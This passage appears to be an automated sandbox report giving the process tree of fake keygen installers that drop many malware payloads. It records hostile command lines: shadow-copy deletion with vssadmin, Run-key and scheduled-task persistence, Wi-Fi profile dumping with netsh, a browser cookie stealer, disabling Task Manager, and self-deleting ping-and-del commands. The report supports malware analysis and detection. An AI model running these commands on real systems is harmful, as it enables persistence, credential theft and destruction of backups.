            Loads dropped DLL
            Suspicious use of SetThreadContext
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            PID:1236
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
              Executes dropped EXE
              PID:620
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          Executes dropped EXE
          PID:1604
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          Executes dropped EXE
          Loads dropped DLL
          PID:316
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:1940
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            Executes dropped EXE
            Loads dropped DLL
            PID:2604
            • C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe" -s
              Executes dropped EXE
              PID:3304
              • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
                "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                PID:3964
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                  PID:1676
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    Runs ping.exe
                    PID:2128
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
            PID:4340
    • C:\Users\Admin\Desktop\Magic_File_v3_keygen_by_KeygenNinja.exe
      "C:\Users\Admin\Desktop\Magic_File_v3_keygen_by_KeygenNinja.exe"
      Executes dropped EXE
      PID:2356
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen.bat" "
        Loads dropped DLL
        PID:2144
        • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          Executes dropped EXE
          Loads dropped DLL
          PID:2696
          • C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe"
            Executes dropped EXE
            Suspicious use of SetThreadContext
            PID:2652
            • C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe -txt -scanlocal -file:potato.dat
              Executes dropped EXE
              PID:3024
        • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe
          keygen-step-3.exe
          Executes dropped EXE
          PID:2876
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe"
            PID:2164
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              Runs ping.exe
              PID:3008
        • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-4.exe
          keygen-step-4.exe
          Executes dropped EXE
          Loads dropped DLL
          PID:2964
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"
            Executes dropped EXE
            Loads dropped DLL
            Writes to the Master Boot Record (MBR)
            Suspicious use of NtSetInformationThreadHideFromDebugger
            Suspicious use of SetThreadContext
            PID:1288
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\system32\rundll32.exe 001 install5
              Blocklisted process makes network request
              Writes to the Master Boot Record (MBR)
              PID:3284
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\system32\rundll32.exe 002 install5
              PID:3948
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                PID:3828
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  Kills process with taskkill
                  PID:3792
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im firefox.exe
                PID:2384
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im firefox.exe
                  Kills process with taskkill
                  PID:1812
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\system32\rundll32.exe 003 install5
              Suspicious use of SetThreadContext
              PID:4012
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\system32\rundll32.exe"
                Suspicious use of SetWindowsHookEx
                PID:3132
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"
              PID:4024
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1 -n 3
                Runs ping.exe
                PID:3668
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"
            Suspicious use of SetThreadContext
            PID:3396
            • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
              "{path}"
              PID:4004
            • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
              "{path}"
              PID:3968
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 904
                Program crash
                Suspicious behavior: GetForegroundWindowSpam
                PID:4828
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe"
            Adds Run key to start application
            PID:3676
            • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
              PID:4428
            • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
              PID:4924
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe"
            Suspicious use of SetWindowsHookEx
            PID:1160
            • C:\Users\Admin\AppData\Local\Temp\RarSFX8\lcx.exe
              lcx.exe version2.txt
              PID:2036
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"
            PID:2188
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"
              PID:1420
              • C:\Windows\SysWOW64\PING.EXE
                ping 1.1.1.1 -n 1 -w 3000
                Runs ping.exe
                PID:2548
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX8\DreamTrips.bat" "
            PID:4648
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1Hgx67
              Modifies Internet Explorer settings
              Suspicious use of FindShellTrayWindow
              Suspicious use of SetWindowsHookEx
              PID:4716
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4716 CREDAT:275457 /prefetch:2
                Modifies Internet Explorer settings
                Suspicious use of SetWindowsHookEx
                PID:2568
          • C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe"
            Checks whether UAC is enabled
            Suspicious use of SetWindowsHookEx
            PID:3376
    • C:\Users\Admin\Desktop\LtHv0O2KZDK4M637.exe
      "C:\Users\Admin\Desktop\LtHv0O2KZDK4M637.exe"
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1732
    • C:\Users\Admin\Desktop\api.exe
      "C:\Users\Admin\Desktop\api.exe"
      Executes dropped EXE
      Enumerates connected drives
      Writes to the Master Boot Record (MBR)
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:2308
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" "https://adlice.com/thanks-downloading-diag/?utm_campaign=diag&utm_source=soft&utm_medium=btn"
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        PID:1208
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:275457 /prefetch:2
          Drops desktop.ini file(s)
          Modifies Internet Explorer settings
          Suspicious use of SetWindowsHookEx
          PID:4436
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:930819 /prefetch:2
          Modifies Internet Explorer settings
          Suspicious use of SetWindowsHookEx
          PID:6060
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:668676 /prefetch:2
          Suspicious use of SetWindowsHookEx
          PID:2164
    • C:\Users\Admin\Desktop\31.exe
      "C:\Users\Admin\Desktop\31.exe"
      Executes dropped EXE
      PID:3036
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F.tmp\40.tmp\41.bat C:\Users\Admin\Desktop\31.exe"
        PID:2980
        • C:\Program Files\Java\jre7\bin\javaw.exe
          "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"
          PID:2536
        • C:\Users\Admin\AppData\Roaming\2.exe
          C:\Users\Admin\AppData\Roaming\2.exe
          Executes dropped EXE
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: EnumeratesProcesses
          Suspicious behavior: MapViewOfSection
          PID:1076
          • C:\Users\Admin\AppData\Roaming\2.exe
            C:\Users\Admin\AppData\Roaming\2.exe
            Executes dropped EXE
            Suspicious use of SetThreadContext
            Suspicious behavior: EnumeratesProcesses
            Suspicious behavior: MapViewOfSection
            Suspicious use of AdjustPrivilegeToken
            PID:2148
        • C:\Users\Admin\AppData\Roaming\3.exe
          C:\Users\Admin\AppData\Roaming\3.exe
          Executes dropped EXE
          Checks QEMU agent file
          Adds Run key to start application
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of SetWindowsHookEx
          PID:2632
          • C:\Users\Admin\AppData\Roaming\3.exe
            C:\Users\Admin\AppData\Roaming\3.exe
            Checks QEMU agent file
            Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4288
        • C:\Users\Admin\AppData\Roaming\4.exe
          C:\Users\Admin\AppData\Roaming\4.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2744
          • C:\Windows\SysWOW64\regsvr32.exe
            C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@2744
            PID:3712
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f0
              Blocklisted process makes network request
              PID:3800
        • C:\Users\Admin\AppData\Roaming\5.exe
          C:\Users\Admin\AppData\Roaming\5.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of SetWindowsHookEx
          PID:2588
        • C:\Users\Admin\AppData\Roaming\6.exe
          C:\Users\Admin\AppData\Roaming\6.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1776
        • C:\Users\Admin\AppData\Roaming\7.exe
          C:\Users\Admin\AppData\Roaming\7.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:1900
        • C:\Users\Admin\AppData\Roaming\8.exe
          C:\Users\Admin\AppData\Roaming\8.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of AdjustPrivilegeToken
          PID:2352
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"
            PID:1632
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"
              Adds Run key to start application
              PID:2676
          • C:\Users\Admin\AppData\Roaming\feeed.exe
            "C:\Users\Admin\AppData\Roaming\feeed.exe"
            Suspicious use of SetThreadContext
            PID:5016
            • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
              "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
              Suspicious behavior: SetClipboardViewer
              Suspicious use of SetWindowsHookEx
              PID:3704
              • C:\Windows\SysWOW64\netsh.exe
                "netsh" wlan show profile
                PID:2192
        • C:\Users\Admin\AppData\Roaming\9.exe
          C:\Users\Admin\AppData\Roaming\9.exe
          Executes dropped EXE
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2180
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp"
            Creates scheduled task(s)
            PID:3664
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4628
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4648
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4656
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4680
          • C:\Users\Admin\AppData\Roaming\9.exe
            "{path}"
            PID:4700
            • C:\Windows\SysWOW64\netsh.exe
              "netsh" wlan show profile
              PID:1848
        • C:\Users\Admin\AppData\Roaming\10.exe
          C:\Users\Admin\AppData\Roaming\10.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2076
        • C:\Users\Admin\AppData\Roaming\11.exe
          C:\Users\Admin\AppData\Roaming\11.exe
          Executes dropped EXE
          Checks BIOS information in registry
          Maps connected drives based on registry
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1844
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp25B9.tmp"
            Creates scheduled task(s)
            PID:4524
          • C:\Users\Admin\AppData\Roaming\11.exe
            "{path}"
            Suspicious use of SetThreadContext
            Suspicious behavior: MapViewOfSection
            PID:2828
        • C:\Users\Admin\AppData\Roaming\12.exe
          C:\Users\Admin\AppData\Roaming\12.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2124
        • C:\Users\Admin\AppData\Roaming\13.exe
          C:\Users\Admin\AppData\Roaming\13.exe
          Executes dropped EXE
          Checks QEMU agent file
          Adds Run key to start application
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of SetWindowsHookEx
          PID:1604
          • C:\Users\Admin\AppData\Roaming\13.exe
            C:\Users\Admin\AppData\Roaming\13.exe
            Checks QEMU agent file
            Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4312
            • C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe
              "C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"
              Checks QEMU agent file
              Adds Run key to start application
              Suspicious use of NtSetInformationThreadHideFromDebugger
              Suspicious use of SetThreadContext
              Suspicious behavior: MapViewOfSection
              Suspicious use of SetWindowsHookEx
              PID:1908
              • C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe
                "C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"
                Checks QEMU agent file
                Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:3760
        • C:\Users\Admin\AppData\Roaming\14.exe
          C:\Users\Admin\AppData\Roaming\14.exe
          Executes dropped EXE
          Modifies system certificate store
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2648
        • C:\Users\Admin\AppData\Roaming\15.exe
          C:\Users\Admin\AppData\Roaming\15.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:1944
        • C:\Users\Admin\AppData\Roaming\16.exe
          C:\Users\Admin\AppData\Roaming\16.exe
          Executes dropped EXE
          Modifies extensions of user files
          Drops startup file
          Adds Run key to start application
          Drops desktop.ini file(s)
          Drops file in System32 directory
          Drops file in Program Files directory
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: RenamesItself
          PID:816
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            PID:952
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              PID:3628
            • C:\Windows\system32\vssadmin.exe
              vssadmin delete shadows /all /quiet
              Interacts with shadow copies
              PID:4044
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            PID:4316
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              PID:6116
            • C:\Windows\system32\vssadmin.exe
              vssadmin delete shadows /all /quiet
              Interacts with shadow copies
              PID:1112
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
            PID:5508
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
            Modifies Internet Explorer settings
            PID:5876
        • C:\Users\Admin\AppData\Roaming\17.exe
          C:\Users\Admin\AppData\Roaming\17.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2012
        • C:\Users\Admin\AppData\Roaming\18.exe
          C:\Users\Admin\AppData\Roaming\18.exe
          Executes dropped EXE
          Maps connected drives based on registry
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of AdjustPrivilegeToken
          PID:3068
        • C:\Users\Admin\AppData\Roaming\19.exe
          C:\Users\Admin\AppData\Roaming\19.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of SetWindowsHookEx
          PID:3008
          • C:\Users\Admin\AppData\Roaming\19.exe
            C:\Users\Admin\AppData\Roaming\19.exe
            Checks QEMU agent file
            Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4936
        • C:\Users\Admin\AppData\Roaming\20.exe
          C:\Users\Admin\AppData\Roaming\20.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:3136
        • C:\Users\Admin\AppData\Roaming\21.exe
          C:\Users\Admin\AppData\Roaming\21.exe
          Executes dropped EXE
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3384
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 476
            PID:3124
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 500
            Program crash
            Suspicious behavior: GetForegroundWindowSpam
            PID:1720
        • C:\Users\Admin\AppData\Roaming\22.exe
          C:\Users\Admin\AppData\Roaming\22.exe
          Executes dropped EXE
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3552
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Suspicious behavior: GetForegroundWindowSpam
            PID:4800
        • C:\Users\Admin\AppData\Roaming\23.exe
          C:\Users\Admin\AppData\Roaming\23.exe
          Executes dropped EXE
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious behavior: MapViewOfSection
          Suspicious use of SetWindowsHookEx
          PID:3744
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            C:\Users\Admin\AppData\Roaming\23.exe
            Checks QEMU agent file
            Adds Run key to start application
            Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:3808
        • C:\Users\Admin\AppData\Roaming\24.exe
          C:\Users\Admin\AppData\Roaming\24.exe
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3832
          • C:\Users\Admin\AppData\Roaming\24.exe
            "{path}"
            Drops file in Drivers directory
            Suspicious use of SetWindowsHookEx
            PID:1552
            • C:\Windows\SysWOW64\netsh.exe
              "netsh" wlan show profile
              PID:3888
        • C:\Users\Admin\AppData\Roaming\25.exe
          C:\Users\Admin\AppData\Roaming\25.exe
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:3868
        • C:\Users\Admin\AppData\Roaming\26.exe
          C:\Users\Admin\AppData\Roaming\26.exe
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of AdjustPrivilegeToken
          PID:3956
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qATVyEXYNcqQZF" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1555.tmp"
            Creates scheduled task(s)
            PID:4116
          • C:\Users\Admin\AppData\Roaming\26.exe
            "{path}"
            PID:4580
        • C:\Users\Admin\AppData\Roaming\27.exe
          C:\Users\Admin\AppData\Roaming\27.exe
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:4016
          • C:\Users\Admin\AppData\Roaming\27.exe
            C:\Users\Admin\AppData\Roaming\27.exe /C
            PID:4092
          • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
            Adds Run key to start application
            Suspicious behavior: MapViewOfSection
            PID:4356
            • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
              C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe /C
              PID:3924
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              PID:3664
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              PID:1948
            • C:\Windows\SysWOW64\mobsync.exe
              C:\Windows\SysWOW64\mobsync.exe
              PID:2256
            • C:\Windows\SysWOW64\mobsync.exe
              C:\Windows\SysWOW64\mobsync.exe
              PID:2168
            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
              "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
              PID:2116
            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
              "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
              PID:5028
            • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe" /W
              PID:3820
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /tn {D67AEED2-E6B3-46A8-A598-592545B18773} /tr "\"C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe\"" /sc HOURLY /mo 5 /F
              Creates scheduled task(s)
              PID:2016
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn axhotbr /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I axhotbr" /SC ONCE /Z /ST 17:28 /ET 17:40
            Creates scheduled task(s)
            PID:4564
        • C:\Users\Admin\AppData\Roaming\28.exe
          C:\Users\Admin\AppData\Roaming\28.exe
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:4084
        • C:\Users\Admin\AppData\Roaming\29.exe
          C:\Users\Admin\AppData\Roaming\29.exe
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2548
          • C:\Windows\SysWOW64\regsvr32.exe
            C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\29.dll f1 C:\Users\Admin\AppData\Roaming\29.exe@2548
            PID:1600
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\29.dll,f0
              Blocklisted process makes network request
              PID:3596
        • C:\Users\Admin\AppData\Roaming\30.exe
          C:\Users\Admin\AppData\Roaming\30.exe
          Drops startup file
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of FindShellTrayWindow
          Suspicious use of SendNotifyMessage
          PID:948
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"
            Drops file in Drivers directory
            Adds Run key to start application
            PID:4948
            • C:\Windows\SysWOW64\REG.exe
              REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              Modifies registry key
              PID:3552
            • C:\Windows\SysWOW64\netsh.exe
              "netsh" wlan show profile
              PID:4724
        • C:\Users\Admin\AppData\Roaming\31.exe
          C:\Users\Admin\AppData\Roaming\31.exe
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:3324
    • C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe
      "C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe"
      Executes dropped EXE
      PID:488
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen.bat" "
        PID:3904
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\intro.exe
          intro.exe 1O5ZF
          Modifies system certificate store
          PID:2228
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          PID:1556
          • C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe"
            PID:4452
            • C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe -txt -scanlocal -file:potato.dat
              PID:5024
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exe
          keygen-step-1.exe
          PID:2140
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe
          keygen-step-2.exe
          Suspicious use of SetWindowsHookEx
          PID:2016
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe" >> NUL
            PID:2196
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              Runs ping.exe
              PID:2296
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe
          keygen-step-3.exe
          PID:3704
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe"
            PID:2288
